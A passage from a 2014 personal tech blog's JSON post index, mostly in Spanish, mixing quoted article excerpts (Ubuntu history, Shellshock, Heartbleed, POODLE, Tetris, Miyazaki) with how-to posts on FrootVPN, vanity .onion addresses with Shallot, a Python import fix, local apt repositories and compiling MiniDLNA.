Ubuntu Core, with snappy transactional updates!"},{"content":" In October of 2004, a new Linux distro appeared on the scene with a curious name”Ubuntu. Even then there were hundreds, today if not thousands, of different Linux distros available. A new one wasn’t particularly unusual, and for some time after its quiet preview announcement, Ubuntu went largely unnoticed. It was yet another Debian derivative. Today, Canonical, the company behind Ubuntu, estimates that there are 25 million Ubuntu users worldwide. That makes Ubuntu the world’s third most popular PC operating system. By Canonical’s estimates, Ubuntu has roughly 90 percent of the Linux market. And Ubuntu is poised to launch a mobile version that may well send those numbers skyrocketing again.\n» Scott Gilbertson | arstechnica.com\n","permalink":"http://karpoke.ignaciocano.com/2014/12/07/ten-years-of-ubuntu-how-linuxs-beloved-newcomer-became-its-criticized-king/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn October of 2004, a new Linux distro appeared on the scene with a\ncurious name”Ubuntu. Even then there were hundreds, today if not\nthousands, of different Linux distros available. A new one wasn’t\nparticularly unusual, and for some time after its quiet preview\nannouncement, Ubuntu went largely unnoticed. It was yet another Debian\nderivative. Today, Canonical, the company behind Ubuntu, estimates\nthat there are 25 million Ubuntu users worldwide. That makes Ubuntu\nthe world’s third most popular PC operating system. By Canonical’s\nestimates, Ubuntu has roughly 90 percent of the Linux market. And\nUbuntu is poised to launch a mobile version that may well send those\nnumbers skyrocketing again.\u003c/p\u003e","title":"Ten years of Ubuntu: how Linux’s beloved newcomer became its criticized king"},{"content":" Una de las principales premisas éticas del ’hacker’, desde los primeros grupos que aparecieron en los años 90 del siglo pasado, es la difusión de información sobre cómo funcionan las redes, los ordenadores y, en general, la tecnología. » II » III » IV » V » VI » VII\n» Mercé Molist | elmundo.es\n","permalink":"http://karpoke.ignaciocano.com/2014/12/07/donde-aprendieron-los-hackers-a-ser-hackers/","summary":"\u003cblockquote\u003e\n\u003cp\u003eUna de las principales premisas éticas del ’hacker’, desde los\nprimeros grupos que aparecieron en los años 90 del siglo pasado, es la\ndifusión de información sobre cómo funcionan las redes, los\nordenadores y, en general, la tecnología. » \u003ca href=\"http://www.elmundo.es/tecnologia/2014/10/25/5449e3e5ca474136598b456c.html\"\u003eII\u003c/a\u003e » \u003ca href=\"http://www.elmundo.es/tecnologia/2014/11/02/54532c7e268e3ede1d8b456c.html\"\u003eIII\u003c/a\u003e » \u003ca href=\"http://www.elmundo.es/tecnologia/2014/11/09/545dcacd22601d1d5e8b456c.html\"\u003eIV\u003c/a\u003e\n» \u003ca href=\"http://www.elmundo.es/tecnologia/2014/11/15/5465e4e3ca474129688b4576.html\"\u003eV\u003c/a\u003e » \u003ca href=\"http://www.elmundo.es/tecnologia/2014/11/22/546f412c268e3e77128b4583.html\"\u003eVI\u003c/a\u003e » \u003ca href=\"http://www.elmundo.es/tecnologia/2014/11/29/547822f7e2704efd448b4570.html\"\u003eVII\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Mercé Molist | \u003ca href=\"http://www.elmundo.es/tecnologia/2014/10/19/5440ba19ca4741894a8b456f.html\"\u003eelmundo.es\u003c/a\u003e\u003c/p\u003e","title":"¿Dónde aprendieron los 'hackers' a ser ’hackers’?"},{"content":" La razón por la que eligieron a Miyazaki para el Oscar, que será otorgado en una ceremonia privada en la sala Ray Dolby, del Hollywood \u0026amp; Highland Center, es porque este director ha hecho soñar a muchas personas alrededor del mundo con sus historias, con sus dibujos, con sus encantadores personajes, en fin porque es un grande.\n» Ivonne Lara | hipertextual.com\n","permalink":"http://karpoke.ignaciocano.com/2014/12/07/por-que-le-daran-el-oscar-honorifico-a-hayao-miyazaki/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa razón por la que eligieron a Miyazaki para el Oscar, que será otorgado en\nuna ceremonia privada en la sala Ray Dolby, del Hollywood \u0026amp; Highland Center,\nes porque \u003cem\u003eeste director ha hecho soñar a muchas personas alrededor del\nmundo con sus historias\u003c/em\u003e, con sus dibujos, con sus encantadores personajes,\nen fin \u003cem\u003eporque es un grande\u003c/em\u003e.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Ivonne Lara | \u003ca href=\"http://hipertextual.com/2014/11/hayao-miyazaki-oscar-honorifico\"\u003ehipertextual.com\u003c/a\u003e\u003c/p\u003e","title":"¿Por qué le darán el Oscar Honorífico a Hayao Miyazaki?"},{"content":" ¿Conocéis Archive.org? Es una organización sin ánimo de lucro que desde 1996 y con sede en San Francisco, se dedica a recopilar y archivar ”textos, audio, imágenes en movimiento, y software, así como páginas web” para ponerlos a disposición de todos nosotros de forma gratuita. Desde la organización tuvieron la genial idea de recopilar 900 videojuegos Arcade creados desde 1970 a 1990 y ofrecérnoslos gratuitamente, on-line, para deleite y regocijo nuestro. » archive.org » The InternetArcade\n» yofuiaegb.com\n","permalink":"http://karpoke.ignaciocano.com/2014/12/06/ya-puedes-jugar-a-todas-las-maquinas-recreativas-de-tu-infancia-gratis/","summary":"\u003cblockquote\u003e\n\u003cp\u003e¿Conocéis Archive.org? Es una organización sin ánimo de lucro que\ndesde 1996 y con sede en San Francisco, se dedica a recopilar y\narchivar ”textos, audio, imágenes en movimiento, y software, así como\npáginas web” para ponerlos a disposición de todos nosotros de forma\ngratuita. Desde la organización tuvieron la genial idea de recopilar\n900 videojuegos Arcade creados desde 1970 a 1990 y ofrecérnoslos\ngratuitamente, on-line, para deleite y regocijo nuestro.\n» \u003ca href=\"https://archive.org/\"\u003earchive.org\u003c/a\u003e\n» \u003ca href=\"https://archive.org/details/internetarcade\"\u003eThe InternetArcade\u003c/a\u003e\u003c/p\u003e","title":"Ya puedes jugar a todas las máquinas recreativas de tu infancia gratis"},{"content":" Desde el punto de vista de la física, un tsunami es sencillamente una onda sostenida por la gravedad terrestre (y no por el viento, como las olas de la playa. Tampoco es correcta la denominación de ”ondas de marea”, ya que no son las mareas la razón de su origen) en aguas poco profundas.\n» Agatha | eltercerprecog.blogspot.com.es\n","permalink":"http://karpoke.ignaciocano.com/2014/12/01/lo-posible-de-lo-imposible-la-fisica-de-un-tsunami/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDesde el punto de vista de la física, un tsunami es sencillamente una\nonda sostenida por la gravedad terrestre (y no por el viento, como las\nolas de la playa. Tampoco es correcta la denominación de ”ondas de\nmarea”, ya que no son las mareas la razón de su origen) en aguas poco\nprofundas.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Agatha | \u003ca href=\"http://eltercerprecog.blogspot.com.es/2014/12/lo-posible-de-lo-imposible-la-fisica-de.html\"\u003eeltercerprecog.blogspot.com.es\u003c/a\u003e\u003c/p\u003e","title":"Lo posible de lo imposible: la física de un tsunami"},{"content":" Finally, Bradley received an e-mail from 10x, a talent company. 10x was started by two music and entertainment managers, Michael Solomon and Rishon Blumberg, who for the past nineteen years have represented rock stars, including John Mayer and Vanessa Carlton. Recently, in the wake of the digital revolution and the music industry’s implosion, Solomon and Blumberg have begun serving as agents for technologists. 10x claims to represent digital ”rock stars”; the company’s name comes from the idea, well established in the tech world, that the very best programmers are superstars, capable of achieving ten times the productivity of their merely competent colleagues. In HBO’s ”Silicon Valley,” a self-effacing character named Big Head compliments his friend’s coding skills by saying, ”Richard’s a 10xer. I’m, like, barely an xer.”\n» Lizzie Widdicombe | newy orker.com\n","permalink":"http://karpoke.ignaciocano.com/2014/11/23/the-programmers-price/","summary":"\u003cblockquote\u003e\n\u003cp\u003eFinally, Bradley received an e-mail from 10x, a talent company. 10x\nwas started by two music and entertainment managers, Michael Solomon\nand Rishon Blumberg, who for the past nineteen years have represented\nrock stars, including John Mayer and Vanessa Carlton. Recently, in the\nwake of the digital revolution and the music industry’s implosion,\nSolomon and Blumberg have begun serving as agents for technologists.\n10x claims to represent digital ”rock stars”; the company’s name comes\nfrom the idea, well established in the tech world, that the very best\nprogrammers are superstars, capable of achieving ten times the\nproductivity of their merely competent colleagues. In HBO’s ”Silicon\nValley,” a self-effacing character named Big Head compliments his\nfriend’s coding skills by saying, ”Richard’s a 10xer. I’m, like,\nbarely an xer.”\u003c/p\u003e","title":"The programmer’s price"},{"content":" A lot of engineers looking to join ZenPayroll are interested in hearing more about our development workflow. Put more simply, how do ZenPayrollers write software? The answer to that is constantly changing, as we’re always refining our workflows to fit our ever changing needs, but I’ll cover in some detail the way we do things today.\n» Edward Kim | engineering.zenpayroll.com\n","permalink":"http://karpoke.ignaciocano.com/2014/11/23/this-is-how-we-zenpayroll-our-development-workflow/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA lot of engineers looking to join ZenPayroll are interested in\nhearing more about our development workflow. Put more simply, how do\nZenPayrollers write software? The answer to that is constantly\nchanging, as we’re always refining our workflows to fit our ever\nchanging needs, but I’ll cover in some detail the way we do things\ntoday.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Edward Kim | \u003ca href=\"http://engineering.zenpayroll.com/this-is-how-we-zenpayroll-our-development-workflow/\"\u003eengineering.zenpayroll.com\u003c/a\u003e\u003c/p\u003e","title":"This is how we ZenPayroll: Our Development Workflow"},{"content":" Tetris was formally released in June 1984 by the Academy of Sciences, after initially spreading among academics and the computer literate by way of copied floppy disks. As a tile-fitting puzzler, Tetris captivated these members of intelligentsia. After all, here was a game constructed of pristine shapes taken straight from Platonic idealism.\n» Jagger Gravning | motherboard.vice.com\n","permalink":"http://karpoke.ignaciocano.com/2014/11/23/the-man-who-made-tetris/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTetris was formally released in June 1984 by the Academy of Sciences,\nafter initially spreading among academics and the computer literate by\nway of copied floppy disks. As a tile-fitting puzzler, Tetris\ncaptivated these members of intelligentsia. After all, here was a game\nconstructed of pristine shapes taken straight from Platonic idealism.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Jagger Gravning | \u003ca href=\"http://motherboard.vice.com/read/the-man-who-made-tetris\"\u003emotherboard.vice.com\u003c/a\u003e\u003c/p\u003e","title":"The Man Who Made ’Tetris’"},{"content":" Ha pasado mucho tiempo luego de que apareciera por primera vez la historia de Dragon Ball. 30 años en que su creador, Akira Toriyama, publicara la historia de un pequeño niño que juntos a sus amigos buscaban unas esferas mágicas que al reunirlas podrían pedir un deseo.\n» Ivonne Lara | hipertextual.com\n","permalink":"http://karpoke.ignaciocano.com/2014/11/22/celebra-dragon-ball-cumple-30-anos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHa pasado mucho tiempo luego de que apareciera por primera vez la\nhistoria de Dragon Ball. 30 años en que su creador, Akira Toriyama,\npublicara la historia de un pequeño niño que juntos a sus amigos\nbuscaban unas esferas mágicas que al reunirlas podrían pedir un deseo.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Ivonne Lara | \u003ca href=\"http://hipertextual.com/2014/11/dragon-ball-cumple-30-anos\"\u003ehipertextual.com\u003c/a\u003e\u003c/p\u003e","title":"Celebra, Dragon Ball cumple 30 años"},{"content":" Han pasado 20 años desde el nacimiento de Daft Punk, y apenas llevan llevan cuatro álbumes de estudio (además de una banda sonora para película que, para algunos, cuenta como un quinto álbum), pero es tanto lo que han cambiado y es tanto lo que nos han sorprendido, que su meta fue cumplida, revolucionaron la música electrónica.\n» Eduardo Marin | hipertextual.com\n","permalink":"http://karpoke.ignaciocano.com/2014/11/22/daft-punk-el-duo-frances-que-revoluciono-la-musica-electronica/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHan pasado 20 años desde el nacimiento de Daft Punk, y apenas llevan\nllevan cuatro álbumes de estudio (además de una banda sonora para\npelícula que, para algunos, cuenta como un quinto álbum), pero es\ntanto lo que han cambiado y es tanto lo que nos han sorprendido, que\nsu meta fue cumplida, revolucionaron la música electrónica.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Eduardo Marin | \u003ca href=\"http://hipertextual.com/2014/11/daft-punk\"\u003ehipertextual.com\u003c/a\u003e\u003c/p\u003e","title":"Daft Punk, el dúo francés que revolucionó la música electrónica"},{"content":" Remember Heartbleed? If you believe the hype today, Shellshock is in that league and with an equally awesome name albeit bereft of a cool logo (someone in the marketing department of these vulns needs to get on that). But in all seriousness, it does have the potential to be a biggie and as I did with Heartbleed, I wanted to put together something definitive both for me to get to grips with the situation and for others to dissect the hype from the true underlying risk.\n» Troy Hunt | troyhunt.com\n","permalink":"http://karpoke.ignaciocano.com/2014/11/14/everything-you-need-to-know-about-the-shellshock-bash-bug/","summary":"\u003cblockquote\u003e\n\u003cp\u003eRemember Heartbleed? If you believe the hype today, Shellshock is in\nthat league and with an equally awesome name albeit bereft of a cool\nlogo (someone in the marketing department of these vulns needs to get\non that). But in all seriousness, it does have the potential to be a\nbiggie and as I did with Heartbleed, I wanted to put together\nsomething definitive both for me to get to grips with the situation\nand for others to dissect the hype from the true underlying risk.\u003c/p\u003e","title":"Everything you need to know about the Shellshock Bash bug"},{"content":" Every now and then in the world of security, something rather serious and broad-reaching happens and we all run around like headless chicken wondering what on earth it means. Did the NSA finally ”get us”? Is SSL dead? Is the sky falling? Well it’s bad, but not for everyone and quite possibly not as bad as many are saying it is.\n» Troy Hunt | troyhunt.com\n","permalink":"http://karpoke.ignaciocano.com/2014/11/14/everything-you-need-to-know-about-the-heartbleed-ssl-bug/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEvery now and then in the world of security, something rather serious\nand broad-reaching happens and we all run around like headless chicken\nwondering what on earth it means. Did the NSA finally ”get us”? Is SSL\ndead? Is the sky falling? Well it’s bad, but not for everyone and\nquite possibly not as bad as many are saying it is.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Troy Hunt | \u003ca href=\"http://www.troyhunt.com/2014/04/everything-you-need-to-know-about.html\"\u003etroyhunt.com\u003c/a\u003e\u003c/p\u003e","title":"Everything you need to know about the Heartbleed SSL bug"},{"content":" My colleague, Bodo M¶ller, in collaboration with Thai Duong and Krzysztof Kotowicz (also Googlers), just posted details about a padding oracle attack against CBC-mode ciphers in SSLv3. This attack, called POODLE, is similar to the BEAST attack and also allows a network attacker to extract the plaintext of targeted parts of an SSL connection, usually cookie data. Unlike the BEAST attack, it doesn’t require such extensive control of the format of the plaintext and thus is more practical. Fundamentally, the design flaw in SSL/TLS that allows this is the same as with Lucky13 and Vaudenay’s two attacks: SSL got encryption and authentication the wrong way around – it authenticates before encrypting.\n» Adam Langley | imperialviolet.org\n","permalink":"http://karpoke.ignaciocano.com/2014/11/14/poodle-attacks-on-sslv3/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMy colleague, Bodo M¶ller, in collaboration with Thai Duong and\nKrzysztof Kotowicz (also Googlers), just posted details about a\npadding oracle attack against CBC-mode ciphers in SSLv3. This attack,\ncalled POODLE, is similar to the BEAST attack and also allows a\nnetwork attacker to extract the plaintext of targeted parts of an SSL\nconnection, usually cookie data. Unlike the BEAST attack, it doesn’t\nrequire such extensive control of the format of the plaintext and thus\nis more practical. Fundamentally, the design flaw in SSL/TLS that\nallows this is the same as with Lucky13 and Vaudenay’s two attacks:\nSSL got encryption and authentication the wrong way around – it\nauthenticates before encrypting.\u003c/p\u003e","title":"POODLE attacks on SSLv3"},{"content":"FrootVPN es un servicio VPN que se anuncia enfocado a preservar la privacidad y el anonimato, a la par que gratuito. Mediante el uso de un servicio como éste, podremos conectarnos a Internet de forma segura y anónima desde sitios que pudieran no serlo, por ejemplo, redes abiertas que no usan cifrado, servicios que restringen el acceso por país, países que censuran la libertad de expresión o el acceso a la cultura, etc.\nPor supuesto, dado que todo nuestro tráfico irá a través de un tercero, no estaría demás tomar medidas adicionales como usar HTTPS, o no acceder en la medida de lo posible a servicios delicados como banca electrónica.\nEl primer paso antes de configurar nuestro PC o móvil es crear una cuenta en su web.\nAndroid Conectar desde Android es tan sencillo como crear una conexión VPN nueva. Vamos al menú Ajustes \u0026gt; Más \u0026gt; VPN \u0026gt; Añadir, y rellenamos los datos:\nParámetro Valor Tipo L2TP/IPSec PSK Dirección del servidor se-vpn.frootvpn.com Clave compartida frootvpnsecret Le damos a conectar e introducimos nuestro usuario y contraseña.\nUbuntu Conectar desde Ubuntu es casi tan sencillo como en Android. Antes que nada, comprobamos que tenemos instalamos el paquete openvpn, disponible en los repositorios.\nDescargarmaos el fichero de configuración desde su página:\n$ wget https://www.frootvpn.com/files/frootvpn.ovpn $ sudo mv frootvpn.ovpn /etc/openvpn/ Y nos conectamos simplemente ejecutando:\n$ sudo openvpn --config /etc/openvpn/frootvpn.ovpn Si tuviéramos problemas al conectar a alguna web, añadir la siguiente línea en el fichero /etc/resolv.conf (o en /etc/resolvconf/resolv.conf.d/base si usamos resolvconf) podría servir:\nnameserver 80.67.0.2 Configurar FrootVPN con Network Manager Si utilizamos NetworkManager y queremos configurar la conexión a través de él, nos encontraremos que crear la conexión importando el fichero de configuración que nos hemos descargado no nos funciona.\nSi ni siquiera nos aparece la opción de configurar redes VPN, deberemos instalar el paquete network-manager-openvpn.\nPara que nos funcione la conexión desde NetworkManager, primero creamos el fichero /etc/openvpn/frootvpn.crt y en él copiamos los certificados que están contenidos en frootvpn.ovpn:\n$ sudo su # cp /etc/openvpn/frootvpn.{ovpn,crt} # sed -n \u0026#39;/-----BEGIN/,/-----END/p\u0026#39; /etc/openvpn/frootvpn.crt | sponge /etc/openvpn/frootvpn.crt Después, vamos al menú de gestión de redes \u0026gt; Conexiones VPN \u0026gt; Configurar VPN \u0026gt; Añadir \u0026gt; Importar una configuración VPN guardada, y seleccionamos el fichero que nos hemos descargado.\nEn la pantalla de configuración, cambiaremos:\nel tipo de autenticación: contraseña pondremos nuestro usuario y contraseña en el certificado CA seleccionaremos el fichero `/etc/openvpn/frootvpn.crt` Y ya está.\nReferencias » frootvpn.com » Ernesto | Which VPN services take your anonymity seriously? 2014 edition » PPTP vs L2TP/IPSEC vs OpenVPN\n","permalink":"http://karpoke.ignaciocano.com/2014/11/14/frootvpn-servicio-vpn-anonimo-y-gratuito-para-android-y-ubuntu/","summary":"\u003cp\u003e\u003ca href=\"https://www.frootvpn.com/\"\u003eFrootVPN\u003c/a\u003e es un servicio VPN que se anuncia enfocado a preservar la\nprivacidad y el anonimato, a la par que gratuito. Mediante el uso de un\nservicio como éste, podremos conectarnos a Internet de forma segura y\nanónima desde sitios que pudieran no serlo, por ejemplo, redes abiertas\nque no usan cifrado, servicios que restringen el acceso por país, países\nque censuran la libertad de expresión o el acceso a la cultura, etc.\u003c/p\u003e","title":"FrootVPN, servicio VPN anónimo y gratuito para Android y Ubuntu"},{"content":" La Máquina Analítica no tiene ninguna pretensión de producir nada. Puede hacer cualquier cosa que sepamos cómo ordenarle que haga. Puede seguir un análisis; pero no tiene la capacidad de anticipar ninguna relación o verdad analíticas. Su función es ayudarnos a hacer accesible aquello con lo que ya estamos familiarizados. Está diseñada para hacer esto principalmente, claro está, por medio de sus facultades ejecutivas; pero es probable que ejerza de otra manera una influencia indirecta y recíproca sobre la propia ciencia. Porque, al distribuir y combinar las verdades y las fórmulas del análisis, de manera que las combinaciones mecánicas de la máquina las puedan manejar con mayor rapidez y facilidad, las relaciones y la naturaleza de muchas cuestiones de la ciencia quedarán bañadas en otra luz y podrán investigarse en mayor profundidad. Sin duda, esto es una consecuencia indirecta y, en parte, especulativa, de tal invento. Sin embargo, es evidente que, en general, al concebir una nueva forma de registrar verdades matemáticas y arrojarlas para su uso, es probable que nos inspiren nuevas perspectivas que, de nuevo, deben reaccionar en la fase más teórica del asunto. Todas las ampliaciones del poder humano, o aumentos del conocimiento humano, conllevan siempre varias influencias colaterales, aparte de los objetivos principal y secundario obtenidos.\n» Gabriel Rodríguez Alberich | notage.org\n","permalink":"http://karpoke.ignaciocano.com/2014/11/14/traduccion-de-la-nota-g/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa Máquina Analítica no tiene ninguna pretensión de producir nada.\nPuede hacer cualquier cosa que sepamos cómo ordenarle que haga. Puede\nseguir un análisis; pero no tiene la capacidad de anticipar ninguna\nrelación o verdad analíticas. Su función es ayudarnos a hacer\naccesible aquello con lo que ya estamos familiarizados. Está diseñada\npara hacer esto principalmente, claro está, por medio de sus\nfacultades ejecutivas; pero es probable que ejerza de otra manera una\ninfluencia indirecta y recíproca sobre la propia ciencia. Porque, al\ndistribuir y combinar las verdades y las fórmulas del análisis, de\nmanera que las combinaciones mecánicas de la máquina las puedan\nmanejar con mayor rapidez y facilidad, las relaciones y la naturaleza\nde muchas cuestiones de la ciencia quedarán bañadas en otra luz y\npodrán investigarse en mayor profundidad. Sin duda, esto es una\nconsecuencia indirecta y, en parte, especulativa, de tal invento. Sin\nembargo, es evidente que, en general, al concebir una nueva forma de\nregistrar verdades matemáticas y arrojarlas para su uso, es probable\nque nos inspiren nuevas perspectivas que, de nuevo, deben reaccionar\nen la fase más teórica del asunto. Todas las ampliaciones del poder\nhumano, o aumentos del conocimiento humano, conllevan siempre varias\ninfluencias colaterales, aparte de los objetivos principal y\nsecundario obtenidos.\u003c/p\u003e","title":"Traducción de la Nota G"},{"content":"Hace unos días salió a la luz que Facebook estaba disponible a través de un dominio .onion en la red Tor.\nLas direcciones .onion se crean al aplicar una codificación base32 a los primeros 80 bytes del hash SHA1 de la clave privada del servidor. Sabiendo esto, crear una dirección que contenga palabras clave concretas es cuestión de fuerza bruta y tiempo.\nUn programa que nos servirá para crear dominios que cumplan con nuestros requisitos es Shallot.\nDescarga y compilación $ git clone https://github.com/katmagic/Shallot.git $ cd Shallot $ ./configure $ make Uso Su uso es sencillo:\n$ ./shallot ^test Rendimiento Tiempo estimado para generar un dominio con un procesador a 1.5Ghz:\nCaracteres Tiempo aproximado \u0026lt;4 menos de 1 segundo 4 2 segundos 5 1 minuto 6 30 minutos 7 1 día 8 25 días 9 1 año 10 40 años 11 640 años 12 10 mil años 13 160 mil años 14 2.6 millones de años Referencias » Servicios ocultos en la red Tor\n","permalink":"http://karpoke.ignaciocano.com/2014/11/14/creando-un-dominio-onion-mas-o-menos-personalizado/","summary":"\u003cp\u003eHace unos días salió a la luz que Facebook estaba disponible a través de\nun \u003ca href=\"https://lists.torproject.org/pipermail/tor-talk/2014-October/035413.html\"\u003edominio .onion\u003c/a\u003e en la red Tor.\u003c/p\u003e\n\u003cp\u003eLas direcciones .onion se crean al aplicar una \u003ca href=\"https://gitweb.torproject.org/torspec.git?a=blob_plain;hb=HEAD;f=rend-spec.txt\"\u003ecodificación base32 a los primeros 80 bytes del hash SHA1 de la clave privada del servidor\u003c/a\u003e.\nSabiendo esto, crear una dirección que contenga palabras clave concretas\nes cuestión de fuerza bruta y tiempo.\u003c/p\u003e\n\u003cp\u003eUn programa que nos servirá para crear dominios que cumplan con nuestros\nrequisitos es \u003ca href=\"https://github.com/katmagic/Shallot\"\u003eShallot\u003c/a\u003e.\u003c/p\u003e","title":"Creando un dominio .onion (más o menos) personalizado"},{"content":"Si estando en un entorno virtual, nos encontramos con el error:\nImportError: No module named _sysconfigdata_nd Es debido a un conocido error en Ubuntu, por el cual dicho fichero se encuentra en otra ubicación, en lugar de /usr/lib/python2.7.\nEn 32 bits:\n$ dpkg -S _sysconfigdata_nd.py libpython2.7-minimal:i386: /usr/lib/python2.7/plat-i386-linux-gnu/_sysconfigdata_nd.py En 64 bits:\n$ dpkg -S _sysconfigdata_nd.py libpython2.7-minimal:amd64: /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.py Una manera de evitarlo es crear un enlace simbólico:\n$ cd /usr/lib/python2.7 $ sudo ln -s plat-*/_sysconfigdata_nd.py . ","permalink":"http://karpoke.ignaciocano.com/2014/11/13/solucionado-el-error-importerror-no-module-named-_sysconfigdata_nd-en-ubuntu/","summary":"\u003cp\u003eSi estando en un entorno virtual, nos encontramos con el error:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eImportError: No module named _sysconfigdata_nd\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEs debido a un \u003ca href=\"https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1115466\"\u003econocido error en Ubuntu\u003c/a\u003e, por el cual dicho fichero\nse encuentra en otra ubicación, en lugar de \u003ccode\u003e/usr/lib/python2.7\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eEn 32 bits:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ dpkg -S _sysconfigdata_nd.py\nlibpython2.7-minimal:i386: /usr/lib/python2.7/plat-i386-linux-gnu/_sysconfigdata_nd.py\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn 64 bits:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ dpkg -S _sysconfigdata_nd.py\nlibpython2.7-minimal:amd64: /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.py\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eUna manera de evitarlo es crear un enlace simbólico:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ cd /usr/lib/python2.7\n$ sudo ln -s plat-*/_sysconfigdata_nd.py .\n\u003c/code\u003e\u003c/pre\u003e","title":"Solucionado el error «ImportError: No module named _sysconfigdata_nd» en Ubuntu"},{"content":"Al instalar algunos programas a partir del código fuente, tenemos la opción de crear paquetes .deb mediante checkinstall, de tal forma que nos sea más sencillo reinstalarlos, o instalarlos en otros equipos.\nLa idea es crear un repositorio local que podamos acceder mediante apt-get o aptitude, y así podemos delegar la instalación de dependencias.\nDirectorio Si el número de paquetes es relativamente pequeño, de una misma distribución, de una sola arquitectura, etc, lo único que necesitamos es crear un listado de los paquetes disponibles y añadirlo como fuente en el sources.list. Si no es el caso, ya sea porque tenemos paquetes para diferentes distribuciones o diferentes arquitecturas, deberemos organizar los paquetes siguiendo una jerarquía concreta.\nAntes de continuar, instalaremos el paquete apt-dev, el cual contiene las herramientas necesarias.\nSupongamos que tenemos los paquetes en el directorio /var/local/deb. Para crear el listado de paquetes ejecutamos:\n$ cd /var/local/deb $ sudo su # dpkg-scanpackages . /dev/null | gzip -9c \u0026gt; Packages.gz Deberemos ejecutar ese comando cada vez que añadamos o eliminemos un nuevo paquete.\nEl siguiente paso es actualizar el fichero de fuentes /etc/apt/sources.list, añadiendo la línea:\ndeb file:/var/local/deb ./ Una vez actualizada la lista de paquetes disponibles, ya podremos instalarlos normalmente:\n$ sudo aptitude update CD ROM Ya no es algo tan común, pero si necesitamos grabar los paquetes en un CD, basta ejecutar el siguiente comando para tener ese CD como fuente:\n$ sudo apt-cdrom add ","permalink":"http://karpoke.ignaciocano.com/2014/11/12/crear-un-repositorio-de-paquetes-local/","summary":"\u003cp\u003eAl instalar algunos programas a partir del código fuente, tenemos la\nopción de \u003ca href=\"/2014/05/10/crear-paquetes-deb-con-checkinstall/\"\u003ecrear paquetes \u003ccode\u003e.deb\u003c/code\u003e mediante \u003ccode\u003echeckinstall\u003c/code\u003e\u003c/a\u003e, de tal forma\nque nos sea más sencillo reinstalarlos, o instalarlos en otros equipos.\u003c/p\u003e\n\u003cp\u003eLa idea es crear un repositorio local que podamos acceder mediante\n\u003ccode\u003eapt-get\u003c/code\u003e o \u003ccode\u003eaptitude\u003c/code\u003e, y así podemos delegar la instalación de\ndependencias.\u003c/p\u003e\n\u003ch2 id=\"directorio\"\u003eDirectorio\u003c/h2\u003e\n\u003cp\u003eSi el número de paquetes es relativamente pequeño, de una misma\ndistribución, de una sola arquitectura, etc, lo único que necesitamos es\ncrear un listado de los paquetes disponibles y añadirlo como fuente en\nel \u003ccode\u003esources.list\u003c/code\u003e. Si no es el caso, ya sea porque tenemos paquetes para\ndiferentes distribuciones o diferentes arquitecturas, deberemos\norganizar los paquetes siguiendo una jerarquía concreta.\u003c/p\u003e","title":"Crear un repositorio de paquetes local"},{"content":"DLNA define las especificaciones para compartir contenido multimedia entre diferentes dispositivos mediante el uso de protocolos UPnP. Instalaremos un servidor DLNA en Ubuntu Trusty Tahr, MiniDLNA (ahora se llama ReadyMedia), que nos permitirá, por ejemplo, ver películas, escuchar música o ver fotos en el portátil, el móvil o la televisión. Actualmente, no se encuentra en los repositorios, así que lo instalaremos a partir del código fuente. (Otra alternativa sería usar algún repositorio PPA que ya contenga el paquete compilado.)\nCompilación Antes de compilarlo, nos aseguramos de que tenemos las herramientas necesarias instaladas:\n$ sudo aptitude install autoconf g++ subversion linux-source linux-headers-`uname -r` build-essential tofrodos git-core subversion dos2unix make gcc automake cmake checkinstall git-core dpkg-dev fakeroot pbuilder dh-make debhelper devscripts patchutils quilt git-buildpackage pristine-tar git yasm checkinstall cvs mercurial También nos aseguraremos de que tenemos las dependencias instaladas:\n$ sudo aptitude install libexif12 libexif-dev libjpeg8-dev libjpeg-dev libjpeg-turbo8 libjpeg-turbo8-dev libid3tag0 libid3tag0-dev libflac8 libflac-dev libvorbis0a libvorbisenc2 libvorbisfile3 libvorbis-dev libsqlite3-0 libsqlite3-dev libavformat54 libavformat-dev Descargamos el código fuente y lo compilamos:\n$ git clone git://git.code.sf.net/p/minidlna/git minidlna-git $ cd minidlna-git $ ./autogen.sh $ ./configure $ make Ahora podemos, o bien instalarlo directamente:\n$ sudo make install o bien crear un paquete .deb con checkinstall:\n$ sudo checkinstall Configuración Creamos el directorio donde guardaremos la configuración:\n$ mkdir ~/.minidlna Partiremos del fichero de configuración que viene en el código:\n$ cp minidlna.conf ~/.minidlna/minidlna.conf En el fichero de configuración, deberemos especificar con qué usuario se debe ejecutar el servicio, qué directorio contiene los archivos multimedia y dónde deberá guardar la base de datos que utiliza:\nuser=user media_dir=/media/share db_dir=/home/user/.minidlna Ejecución Para lanzar el servicio:\n$ /usr/local/sbin/minidlnad -f ~/.minidlna/minidlna.conf Si vemos que necesitamos que reindexe los contenidos:\n$ 